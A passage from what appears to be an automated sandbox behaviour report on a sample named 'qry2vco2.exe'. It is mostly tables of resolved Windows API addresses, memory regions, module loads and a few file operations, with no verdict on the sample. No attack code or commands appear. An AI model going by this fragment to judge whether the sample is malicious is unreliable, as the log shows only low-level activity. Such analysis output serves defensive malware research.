|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x74f5a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x776e40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x776dd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x776decf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x74f65720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x776de140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x776deb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77719990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77715540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77709dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74f5a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74f80a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x752c0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74f5f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x74f5fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74f81030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74f5a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74f814b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74f5a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74f816f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74f59970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x75243c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74f58710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74f596e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-01-23 14:12:55 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #198: qry2vco2.exe
175
0
| Information | Value |
|---|---|
| ID | #198 |
| File Name | c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe |
| Command Line | qRY2vco2.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:20, Reason: Child Process |
| Unmonitor | End Time: 00:03:26, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x4f4 |
| Parent PID | 0x524 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F70
0x
648
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001f0000 | 0x002adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x003d0000 | 0x003f9fff | Memory Mapped File | r |
|
|
|
- |
| qry2vco2.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004c0000 | 0x004c0000 | 0x005bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x0067ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000730000 | 0x00730000 | 0x0073ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000740000 | 0x00740000 | 0x008c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000008d0000 | 0x008d0000 | 0x00a50fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x01e5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74220000 | 0x742b1fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x74ab0000 | 0x74abbfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75180000 | 0x7518efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75310000 | 0x766cefff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x766d0000 | 0x7678dfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76790000 | 0x76c6cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x77260000 | 0x772a3fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77300000 | 0x7738cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc57b4ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\qRY2vco264.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x74f40000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x77550000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x766d0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x75030000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76c70000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x742f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\qry2vco2.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74f660c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74f66110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x74f587e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x74f65f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x74f64a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x74f65fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x74f5a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x74f5c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x74f66300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x74f59a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74f661b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x74f5fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77704f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x74f59a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x74f579b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x74f5fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74f592b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74f5a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74f66180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x74f63a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x74f58cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74f65f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74f52af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x74f578f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74f52db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x74f52da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x74f57a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x74f5a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x74f59660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x74f5a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x74f5a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74f587c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x74f58840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74f57940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74f59560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x74f669c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x74f66390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x74f81c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x74f668e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x74f66920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x74f66540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x776f5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x776f5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x74f826a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x776eda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x7770f190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x7770a200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74f674f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x74f59fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x74f52d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x74f575a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74f525e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x74f66870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x74f668c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x74f66900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74f59700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74f51b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77712570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x74f57920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77709920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74f662a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74f66590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x74f66860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x74f59680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74f664a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x74f5a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x74f828e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x74f5a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x74f66020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74f577b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x74f5fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x74f59a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x74f51ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x74f51da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x74f59930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x74f5a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x74f58770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x74f5fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x74f59fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x74f57910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x74f59a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x74f52dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74f51d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74f52b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x74f5a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x74f5a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x776ebae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74f664f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x7756ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x7756fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x775695e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x77570680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x7756ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x7756f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x7756ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x7756ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x7756f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x775706c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x7756efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x7756f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x766dc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x750dee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x750b55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x750b57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x750b9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x750b0820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x750dfbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x76c838f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x76c9b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x76c9b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x76c87740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x76c974e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x76c9efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x76ca4ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x76c94580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x76c91540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x742f1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x742f1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x742f1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x74f5a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x74f5f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x74f57580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x74f59910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x74f66030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x74f65f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x74f65ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x74f5a5d0 |
|
1 | |
